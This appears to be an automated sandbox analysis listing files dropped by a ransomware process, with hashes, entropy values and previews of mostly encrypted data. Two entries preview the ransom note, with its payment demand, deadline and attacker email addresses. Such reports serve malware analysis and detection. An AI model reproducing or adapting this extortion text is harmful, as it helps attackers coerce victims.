                                                                                                    SSDEEP:24:FDJU04nwaOVvW3RA5J4MsHuxATWJr99OHk8asZbPynApsRToXl+rDKU14lx7DWJn:xJUbj3RIZPrx8a9esD3KU1Ax7KJ
                                                                                                    MD5:75FEF8A07D33E832F1B621E04C17D0B5
                                                                                                    SHA1:7F56C530CA8EC423FF94DC5C3524E2DDD5E8C121
                                                                                                    SHA-256:904DA3DD551C0538F61C9AACD5C306C277E2AAB879BC5AE949F9D05A3CF017B5
                                                                                                    SHA-512:8D1FCF39CF68714D247BEB3C1B2008B49EC00E3BC52247E86AF288E71AC5FFE4FA2266FBB1A3B8769975E09264C88ED2FE435516865B9B12643DCEC8871B52D9
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.866303600748375
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Tgwain+/dCKiyURC3sWiKtXjk9BuwoK6SS0DPq20ImZ8MFiBJIyKnZgNi9Se/c3S:Tg4KdC/HoU2A9AwfFjhb0LTnZgNiR/GS
                                                                                                    MD5:583E13BAC760A9D54BB50A4AB62B7D47
                                                                                                    SHA1:F5B188A7AD1209BE6C3FDB1BA7F2C96A7E9D08C4
                                                                                                    SHA-256:47AE4313555B266D1B83C7BFA52B4620575D407EFC314DA5AA9E3A1109A0442E
                                                                                                    SHA-512:C4E11B5E3151A3B200520ED26F9F63C49577CA683B41B9D69D819E6C0621DCB4A6D3EAF57A84C0330887B142543503E6E29616E8A3A5DCC6017B07674A2834B2
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.834080765047139
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:ShRwBM2X94a3wmYLCb6j2DY05CBLM4hxE8SF70NrD1fhcyOfX28OzSc:mRsMC1PYk62/5CBLdxE570rJc/52Sc
                                                                                                    MD5:59760D1E600007E9A525181A18783422
                                                                                                    SHA1:19EFFA952439259A155FB2E1A49B4072440317C9
                                                                                                    SHA-256:22FA422F75A7E1C74C8898F06ADBAE25503C29E0EED3494CF39F93EE4703F990
                                                                                                    SHA-512:6CF5DD203CF9FC7AB090869EE5983BBA770DC0B9208DD3D04AD147CEECBECDD06E337F0C771F9CEDB913E84F6D49401AE8EC50AF2D91F4DB62F8CACA5FD8E3C5
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1315
                                                                                                    Entropy (8bit):7.891853640804863
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:ImmHswri/tWpDZ8HdaM5MlFUY65sRHp3PTuGQRWWagkkYACXHewcz0WWuT:Imk7mKW7WIFuJ3bEEWaDAqlc5T
                                                                                                    MD5:B1966650FA632A145F6048461ADADEF6
                                                                                                    SHA1:C350C39C10B0B45971814A639CBC37255A317575
                                                                                                    SHA-256:85EE0AC161FA9421E3CF482A6EC4802FB6492B80A19E0AEBDFAEA0F453217194
                                                                                                    SHA-512:CCF4633BF990AD1BB7C0678EF32A4D550B2FF45776794F30CAE4476A909E75CC9AE3F2DA8BDF3DE9BA2342F465A475453BAEB6DA091604E5556AB95E1E61018D
                                                                                                    Malicious:false
                                                                                                    Preview:$7..B..q.^A......5..G..t}!(K ...=..(ey#.Phg..q{..0...Z..:K(d..FJ..._Y..Bm7lx.G.p!C......M../s.\p>B.....j8..T.b.;...].?.J..O..~#@O4b.."...........G./.....Er.5.L......nj.6......%.....e3..J....{I.a.-.Csy.......t..9.N.z...3A^.....N.2.1..Y..P/.~x..b9.$B..t\7M..$Y9..O..r.>..AsY.../3N.Y^...r.....h..j..Di. ..r88....J;.=......c...n..^f..b1..#X5.".L....n......].&.PS...4.,....%.L.....@...S0..y->...VbCe3lh.....5.c......< .......N..rX...q....Se...,..3./y..*...To.....;.%-.H..2.&'|......k.|..?.lP.6.......i..y.+.61.[..,.G..$..#9@..2s..,p.z...j=....'E.'. ..Z.....D..f...'w...Q..8yj.I^*S.?..H.M...d.......kH.H.,....z..ia..Y.`.~.*_..L..=.......r......I,h.L........mb.....x......../.............Y...^t.U..^.......M...G.{D."......4.b.Wk.'.!{;o.9..Ulo.;#...NJ..y*..m.....(M.....n/N..[..F6.p..u....;.S...q...D.......a..KD......n.^ 4...%0..e..Q.."z...(.P......7.DFR>..<...L.t..k..1J?.....\/...%P!..pUxa..N-.......AU.:.+..^...c.a.&.`..._..!d.[..{M:.g.U+..Le..E.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):292
                                                                                                    Entropy (8bit):7.098255891974506
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:n8QctDaVborEVJ6nfJ829gGu7tFON61e8fDXW2gENcDiNo7gRwp99eUHn:n8vaVkrEVJE+CAde8rXWEcGMBpOUHn
                                                                                                    MD5:28A7B6213F50B3F96786B05BA0E5F5DF
                                                                                                    SHA1:AA172FA3A4441D6931FBB855D30D2754856DBFD9
                                                                                                    SHA-256:FC3CA0FD32783DF56B32476E3A8598A9BE8E6D4D5F7C8599FDF0094657795834
                                                                                                    SHA-512:D096F6C0A01F51C3F5A287ED14904F6E8C047B8DA1FF887E3E2839CD8321E4F259ABB4396649E7F5EC25414BC29B630395E41F9FEB2974EA82C35863274DDAD4
                                                                                                    Malicious:false
                                                                                                    Preview:.kP.p..7.Jl..|t...........r1.. .....+Z.>...........(.<...o.kY..Z{R.H..A.a.u.T.}.y._..L...C_..a.........|.x...:5\W.O..gZ..^...L..d,.h.P#.^...?]G.......W.`.l ..<.\.?.m..H.j`..a......f.:.a...n,...+........i.C.0.......1..85.G.........KnA.B..Ht.xsO.|.&.....E.....ZA.1...I0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):292
                                                                                                    Entropy (8bit):7.237406352405159
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:bs/lLVxZMPZIxBFgxxDYqEH7v/pQCuzInfcF2FKMnjJ9/doF1XFAwn:Q/p+PZBxDYqkv/yNalcoz/dMFiwn
                                                                                                    MD5:615C5A7D5AFB12591DECD703A8AD5FC9
                                                                                                    SHA1:4C379F02E0FDD95BF140065B930DCDC45752EF45
                                                                                                    SHA-256:EB73BE5FD02BAE943EC2C9B39F066BE361B8FAC4CCBD593F826E69F24E81CCD5
                                                                                                    SHA-512:77BF3997AEC6A6C40CF535ABE440E7E2EBAD9592984CD602516D8BFCDF34497E41E35348A8AD3852E29AEE1C8374819374C825A9000C16C66047ED33D9CAF01D
                                                                                                    Malicious:false
                                                                                                    Preview:.%K........K.=T..........._...\.q..T....a...p.;..s....L..&S)..-y..^.kC.a}...V.c.5L..[].d.9yu.t.....u.bcT..m.......)6K.....7.F...!nV{....kpm..@.DF............-S.;J.....f.5....8O.r.......~7.a..Y.........eO.[....6(.u..!k.d.>... @1W,.Cq.......|j...........E....=.....P2.%...#..0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):292
                                                                                                    Entropy (8bit):7.193655757821941
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:r2BflB3dM3Ik9qRSL4+WdO6/RzcbbAIXhcXq8ho92bZ4TVL2Y/BkF2n:rivdiR9C+WdKl+3e2qH/+In
                                                                                                    MD5:AA8AC3B25F65E165D365D1B285879904
                                                                                                    SHA1:3AD7E3EE19784861475058BE22D436F5495ECF36
                                                                                                    SHA-256:6C4422A6F137620BE911C5471A99D08A42D119E3E0EB999DC16570371BE8956B
                                                                                                    SHA-512:29E0B7422C8480D8B046A4E0CC85174BA775BAAD0CFA24877C45EE13BFF092359798B164FF7C6BA0EFA794F96B8D9CEB2610A461F734D9F81003ADB4C5C570F6
                                                                                                    Malicious:false
                                                                                                    Preview:.)a!..3.uG..,.q..........&+......d4......e...dd.c.:.n....X...A...f.l.......\(.K\Z(.Ud&6....2C..5.....<....J.`Cn.....I8I...iP&6}b.c...i.3.G.T....]iO...N}.....|..x&?[&|U.....c.w!.........n"..IY..p#.+...-.!|..K." .iV.j.Kpqe.!.jm..x.$.$...>.o.:..jI3I.y..pX."..5.~E.K.u.J..V0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):292
                                                                                                    Entropy (8bit):7.147984950927863
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:YBt5ZP45FlCB/EtmYsycwNj6ltP8lvx3UU/nd4lFd6LHn:YBtk5TwMIYs4j+ilvx356gLHn
                                                                                                    MD5:5CBDBF4FC9A701883F1E95B09EFCB44F
                                                                                                    SHA1:89E3E2B8D00D3ECC91E51329894F2B3B587BFFE3
                                                                                                    SHA-256:8609EB0D976459019F1FFDA7DDE7A685602FFD879A589678F4E0D9F4D7C37FFA
                                                                                                    SHA-512:176959A9A794C95F1AB476947341C670A9FE2745D3B5F90319B1116B5E2EF1B955D256D9D2786B0D675B88A73CE73A22F82CE2173A76041290036438BE2FEF23
                                                                                                    Malicious:false
                                                                                                    Preview:.K..A...]...<P7...........`Rs...||QKC.7v..\b....I...`l'......)Y.|...=...!..3.~Bd..S#..N...1.?."...!.9.......9A43.FR....a"e.e...<+P6.r.9M.../_T.a..^y-..C..\./.[.!=.syHWc.?....T9R$..o...7.D.v.6F.5...,y.2..S.._.#....Lc..{oq=..U..uv...1.Y......]...E........o.|.....CL.|..0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:OpenPGP Public Key
                                                                                                    Category:dropped
                                                                                                    Size (bytes):436
                                                                                                    Entropy (8bit):7.4664651036545235
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:GXIFCuwDX3NxFWJdKJxpUvOXxodeTPfHPZY0X8/92wn:GX4C/DX3NDWJdKLpUvOBXDfHPxX8/9/
                                                                                                    MD5:3A8BD00EC26F0155E671716985F0A51B
                                                                                                    SHA1:049F1A9EE31BC708F17F1A39A5DBAA6412C3E3A1
                                                                                                    SHA-256:CB08B4A199EEC298ECF72261AFC4175367C78250DDCB09A111B1CEDB5B4D196C
                                                                                                    SHA-512:87717A49D7E8B676E3F785CB97DFDB15737119FE9F581D1A29D46ECD35D03FBF65E291A3818F110FAB98BE8D15EFAD24F9EF67FDAD36201778F2E1D0C9FBC6D7
                                                                                                    Malicious:false
                                                                                                    Preview:.@.w...`.r.......E.[;..$* ...\.d.; ...r.Ty..[.r.(5..Wo..`...rj/.[d...w.vLaK.......MS!..v.W.2. ...n.)....)`^.s4+.%........4.&.qw)...in.....-m......6*..8.1.1.....K......*.....r.Tf.x..wB.d..Q=..I..n9.q_(6.sg..X/.. .:.......`..'....@...P..'..-...."3D...T.....+h.MN1x..g.Yy...;5q.|.w...<....... .i..p.....N.4..f%.9..%&..*.V. F.Sa.=7.O.]4}S1.I;.."m(..[.o9"....3...u5...).C0h.I.p.......}.....n9...4...0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1200
                                                                                                    Entropy (8bit):7.8376803871223215
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:AtoOrc+lXcAV1060tB38B7bGVhdozy5tEnv6peRH5j9+OQ4T:QogMAVb0L8tbGVhdaKEv6poHJUg
                                                                                                    MD5:C002434319A7B92787C6233588332004
                                                                                                    SHA1:4901EA0853E9477BAD3A3C28F759ED24E6577E55
                                                                                                    SHA-256:842BA06AE4B2148BCDA272916C878A45D2C99CA05180E22BE267347E6828E5DE
                                                                                                    SHA-512:2FB01BA3E10CCB87303A4D1B12660FB9ECFEFE40B24004887A90C5C32D8CA92130818EBBA40BF40AA15F810D89825C9FD3BFA56E7BCDEE8260DF54D1B580A9BF
                                                                                                    Malicious:false
                                                                                                    Preview:K99.....=.8....?..y..{............].C..+6..z!.v.8...+.._.j9.k.z.T'g1....CT[.-.G.E.>.....P.. ..Fhm.j....j.Ad..-#....(m'..6I%.j..6.x.~.......=.i..H.;........Vd&%+ Q?.h.0L...j.x..m.-..'.4..,4.a..w..@..l...|.*R...u;...S3p.....g.TN-*...B.".s6.bf........e..4...z...PE..UP"...,.e...}h.E.QJ...K.2..l......N+l.d..fLR=......ta..dZG...T.j............9Fbu.-Re.Z.s..H._e.s........O....A....o.Gt7....H5.r.Tb....G.".r{G).X......1..9X."Op...%D.../.X..PH........nLfZ..v=oHM.^....O.t..].(.....n..=p..B......i.....#...G..w...L.{.....p.58....V..[~.....@P{K..B\F0..V.I...>/..V.xK9.h....D..g">^.z..m.!6?..?.R..%!_..HN#...\['./.x.......i......._kET..x...W.t.....K.#..QA.......B.....\...."OLT8.>K._.q}...|..6.h=...v..W.h..P.dRw......g........{/..HO...o.....;...HS..u.....]Xc...'l.......Y..w..CW.n.\...f....n^.3.w........TB*.If.......M<..%.\O.s[R).ug'.K.c.O.3>N.Y.i.....*.,..."....3.l:.@P.0.\.....,...Y..2.....C.x...x22..V.R..6......DrN.....*^.VQw.....,..........d-B.s..|X.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):67950
                                                                                                    Entropy (8bit):7.850032082462207
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:tWpcGrjw2RAal82F5EwtJqF1WlDBGOFBbVEmE:oprs2RARw5JqFoJnbhE
                                                                                                    MD5:AF463EDA1337B25B3DDEB622D5414BBF
                                                                                                    SHA1:CCFF7C1473DB6080A28BD7EF7F86C49F9DA30EDF
                                                                                                    SHA-256:9FEB158846F358124B753E77354BDA7C9B7F1A8DC108DD59F37F5DB26C37BDA9
                                                                                                    SHA-512:4276ED6D078623C7216E23574FFE965B99A116A40A86B0ED25F0FC4596A3A10F4194CB92504F8761F25BAE3064CFF6C5FA8929674B2A9334A0E39B565E2147E6
                                                                                                    Malicious:false
                                                                                                    Preview:..G..<....2...)f.=.$......-...Z.....R.K....v.Gv.<..oS.fZ....R...z..".k...8A.]4........}.\..v`....MC....8.s..u...d(&\_.....J.N*.. .......'..*J.:m8ub......<G.h.eU...{'n..S.G.ud...G......L.*N.%H,E..]"...|.... .}..$..p...f.3.....b.Dy"......o(..|..Jz]...9.M..:KZ5Ey.....K.iu.P...[XL.5......a.WO.<.....9.|..(.m.}..&.h.6..'<:.P..t.,.&=.....:R.......Bz......j.<.>....zD^z/.C...$.C......... V._j-.4.^.!.>`.q....T....d.....N#...G.u.ud[7b.}XJm.K.../.G D,.:.\.9.P...l.3..,s.....Y.^.v.(...k.RH.......c.z.M....#.*..8@...}9...].?.........(9f$u.O.X.Z?...:W......J$5aZ.B...u.XB.../..#3.AL#w.s.....!.=G....)...^...$....+2.E3.........m.....i..'[mg.3:..z.o.+-.W.......N.P".'xg:.......~..t.D1.V.? )..._.%C[....\i)'.1.....m-S`..R.w..G..H...:..+.:).sv..X.Y...9.wc...!\.n.....Gu.m}E.Is...MA..5ARR./..:.[k..2.......E...{...-r.+....c#M.g:.x..kv...dgC......a.O...B...).gH..X.eL..p...1..=q.a.w......e.....:......L......l.~..P.!O...;...).[.A:</s.......,f..Q.A..8..+O.p
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):112129
                                                                                                    Entropy (8bit):7.7102423332968435
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:ZYQ/IUDIVYNhZBIDt9KFHgoYF0gOY0yLEJdUjMcpP:pAfAZsVFF0gOjymdYj
                                                                                                    MD5:9C9620CBF1DDE32613CB171DA57668C7
                                                                                                    SHA1:F7783EB4C785DDA88CE1E38BDC4EA1365A0F771D
                                                                                                    SHA-256:3FEAD87933C90A717CAB116FF2139A7AD64716C1190BF612BC7ECD0E287F2A93
                                                                                                    SHA-512:FC539586DB8390033BA309937FA8460769E8D0F0544C545AB1D16BD7E91509DB71C722924023FD85D03A986477E108E3634BF3873AEFDBAA49928C0613D72B3B
                                                                                                    Malicious:false
                                                                                                    Preview:.UA!-...[F.:.d.U..|...i......."."....Y8).l..$}@&t.T:...u....s.>3...ze....^....A(..3Z.i...4....*.....;.`=L.6.zz.w..+x.....E'4.;.m..u..wc.....<U...#....Z......_...g.....X..J?<.7..BT..="..Ks..q+.....8.f....... ..gW.J..Db..o....Z......DTj..)....".O...q...O...txu........B!Siu.#D.U.}vW%....I....`B....7..L.;.eI.....V%.P.......f.........T....rZS..18.....6....6F31(.p...N.._.}.Wl[..S.;.X....1.[_.g5..1.i[.....b...[....p..t...~./".:.Y..FWb.}iE.M1I.7qiBR.fn.p.............u*.{.....w`~J4.m..8p.yN8..I.....P.B.g.".3........:...&).b..bo7JG....@...r..s,.^...[@brJ9..5:r4O..aV...!J.Rk....@....Y...B...O.......&...i..K.>F.&.g_._..O.r.pQp-...Fe.7..$..wJP,k0.4.....@.e..f....4Aq).......f...K..n.G_....%g...f.|<zyX....iS.n2R.*.[o1Y.......A.UUE...|..G...KJ....t....~...bT...0y..)..vV...m...m...YbG.....o;...x.......]......8.[......d...sg\...T.=..N3oH..k....c.<.....G.....?.UCeM#.....3[E.o....< ..l5.W...5M...i.\.......V0...sb..S..T.;._..>.....0I...b.k..+.R-c..
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):420
                                                                                                    Entropy (8bit):7.47790444036284
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:uJDlxa8tQL6QM57VkB0vOL0jUX9W7CZcMHn:uJ5btQW39cYUQe
                                                                                                    MD5:C6C9E479EA2DBFF20A82AA8F565EBB9A
                                                                                                    SHA1:3FF7FE8CC80C61EC6926C6AEA3422D70389A9B75
                                                                                                    SHA-256:87B83BD0088144D93387BDF2C3034D9329D7E2499E209B738CBA88ECF355CA31
                                                                                                    SHA-512:02E50B649BC70DA014BAFC05B234A8E7F32494C75C1B07BE0CE7FB536DD070A1FE0A0238B1837FC86A45C1DDC297DD25E251D5386F52485AD0ABF91D88D76353
                                                                                                    Malicious:true
                                                                                                    Preview:....B..x..l.?.....|.nv...N\.l2..G.G'.i..D.#..j?..KF..>.2...cc,hwq....1.C..h.O.#=..l.f....<G..K._....z.-.a..f.]G ...x..'$...$.....]SV....{:n::|n:y:............Jl....5'.`.6h.)......v...@.........mc.1L.z.n.j...Y.0|.?...&.&'.KK.Q...~......j|..'..R4Y..}u.|j..._.....@..#I.....O........d>...*.......SST.(..4.:3.4R.."...l.{...a..e.....N....@...]y.Q3+.#R&.....PwP..f.n...V...U.....r.'.!w..0.j/...0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):420
                                                                                                    Entropy (8bit):7.47790444036284
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:uJDlxa8tQL6QM57VkB0vOL0jUX9W7CZcMHn:uJ5btQW39cYUQe
                                                                                                    MD5:C6C9E479EA2DBFF20A82AA8F565EBB9A
                                                                                                    SHA1:3FF7FE8CC80C61EC6926C6AEA3422D70389A9B75
                                                                                                    SHA-256:87B83BD0088144D93387BDF2C3034D9329D7E2499E209B738CBA88ECF355CA31
                                                                                                    SHA-512:02E50B649BC70DA014BAFC05B234A8E7F32494C75C1B07BE0CE7FB536DD070A1FE0A0238B1837FC86A45C1DDC297DD25E251D5386F52485AD0ABF91D88D76353
                                                                                                    Malicious:false
                                                                                                    Preview:....B..x..l.?.....|.nv...N\.l2..G.G'.i..D.#..j?..KF..>.2...cc,hwq....1.C..h.O.#=..l.f....<G..K._....z.-.a..f.]G ...x..'$...$.....]SV....{:n::|n:y:............Jl....5'.`.6h.)......v...@.........mc.1L.z.n.j...Y.0|.?...&.&'.KK.Q...~......j|..'..R4Y..}u.|j..._.....@..#I.....O........d>...*.......SST.(..4.:3.4R.."...l.{...a..e.....N....@...]y.Q3+.#R&.....PwP..f.n...V...U.....r.'.!w..0.j/...0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:true
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4992
                                                                                                    Entropy (8bit):7.878747178513949
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:zDEAvsyRzsMZDW/nrjFuNsZJjEPl0Hl/KAJ3Wo1o3YroL2rtbQ:HEAvjJjo/nrdyl0/KAJAbLGC
                                                                                                    MD5:307537E16B60E38BC46227D331508CEB
                                                                                                    SHA1:E0766B720B712551E639245FE525DDA6A588BC0E
                                                                                                    SHA-256:EA5DAFCD95BCB9BB46EB464D246E72643FE879DADE69318041DB36183F2CC817
                                                                                                    SHA-512:13A201BA666653658CF85E07E4386585F83A61D908F08556BCBA0D7128F3D5C2B9988C777C914ED3E7D266A67087547B27EEC43BA8E06FD4081E15DCE8CEC0C3
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4992
                                                                                                    Entropy (8bit):7.878747178513949
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:zDEAvsyRzsMZDW/nrjFuNsZJjEPl0Hl/KAJ3Wo1o3YroL2rtbQ:HEAvjJjo/nrdyl0/KAJAbLGC
                                                                                                    MD5:307537E16B60E38BC46227D331508CEB
                                                                                                    SHA1:E0766B720B712551E639245FE525DDA6A588BC0E
                                                                                                    SHA-256:EA5DAFCD95BCB9BB46EB464D246E72643FE879DADE69318041DB36183F2CC817
                                                                                                    SHA-512:13A201BA666653658CF85E07E4386585F83A61D908F08556BCBA0D7128F3D5C2B9988C777C914ED3E7D266A67087547B27EEC43BA8E06FD4081E15DCE8CEC0C3
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):797
                                                                                                    Entropy (8bit):7.730646896453472
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:IrgXlRkurwqEMwevUv7EgqZqwDGjxwZd33pOQngFtriLRdhe2lwsb8xsiFHrGZBs:2OlOuENqvUjvwSj2Z95O3EPToxYZqdNV
                                                                                                    MD5:F1B83EE0E8454080ED53AC80BA020942
                                                                                                    SHA1:D2E9C401096F84682EC476BF6B15B9EFDECA233E
                                                                                                    SHA-256:7171592A531D6500924EF6CCB806E162830EE0E623652FC73CE696D957718FFB
                                                                                                    SHA-512:95ECCA4FD9AFDEA26F036CDC458261944F137C78CB3C34A1423C7BEAA64AFF621BFFE8E082744BEBB686491A382B761F508AA5B6445A40EF9A1948C7232EA0C7
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):797
                                                                                                    Entropy (8bit):7.730646896453472
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:IrgXlRkurwqEMwevUv7EgqZqwDGjxwZd33pOQngFtriLRdhe2lwsb8xsiFHrGZBs:2OlOuENqvUjvwSj2Z95O3EPToxYZqdNV
                                                                                                    MD5:F1B83EE0E8454080ED53AC80BA020942
                                                                                                    SHA1:D2E9C401096F84682EC476BF6B15B9EFDECA233E
                                                                                                    SHA-256:7171592A531D6500924EF6CCB806E162830EE0E623652FC73CE696D957718FFB
                                                                                                    SHA-512:95ECCA4FD9AFDEA26F036CDC458261944F137C78CB3C34A1423C7BEAA64AFF621BFFE8E082744BEBB686491A382B761F508AA5B6445A40EF9A1948C7232EA0C7
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5679
                                                                                                    Entropy (8bit):7.845715093111063
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:Sou8pVu9Qu1ATLmpLMazVijjSKfFgffafPicQsi+Qk/g6jR/oYjJ:Sou8pJu1AmLzQRfF8fYs8/g6N3F
                                                                                                    MD5:9F21E1FE187C472D1DD4EF93CF7689FF
                                                                                                    SHA1:4D2CBFAA92FE33A016E10FFBF15B812E62A0A97A
                                                                                                    SHA-256:6EAD6C18F7B01784547151A2EA565FD531729C96992F1BBD3F98FECAD4B458E4
                                                                                                    SHA-512:340C2084043A3E16610D1C3F56CCCC2CC396ECEAEB1EDBF3CDF0D116683700680945E8FEA746852C4FABD69B55EF6F15F94157F37A727B2DF723309757ADD131
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5679
                                                                                                    Entropy (8bit):7.845715093111063
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:Sou8pVu9Qu1ATLmpLMazVijjSKfFgffafPicQsi+Qk/g6jR/oYjJ:Sou8pJu1AmLzQRfF8fYs8/g6N3F
                                                                                                    MD5:9F21E1FE187C472D1DD4EF93CF7689FF
                                                                                                    SHA1:4D2CBFAA92FE33A016E10FFBF15B812E62A0A97A
                                                                                                    SHA-256:6EAD6C18F7B01784547151A2EA565FD531729C96992F1BBD3F98FECAD4B458E4
                                                                                                    SHA-512:340C2084043A3E16610D1C3F56CCCC2CC396ECEAEB1EDBF3CDF0D116683700680945E8FEA746852C4FABD69B55EF6F15F94157F37A727B2DF723309757ADD131
                                                                                                    Malicious:false
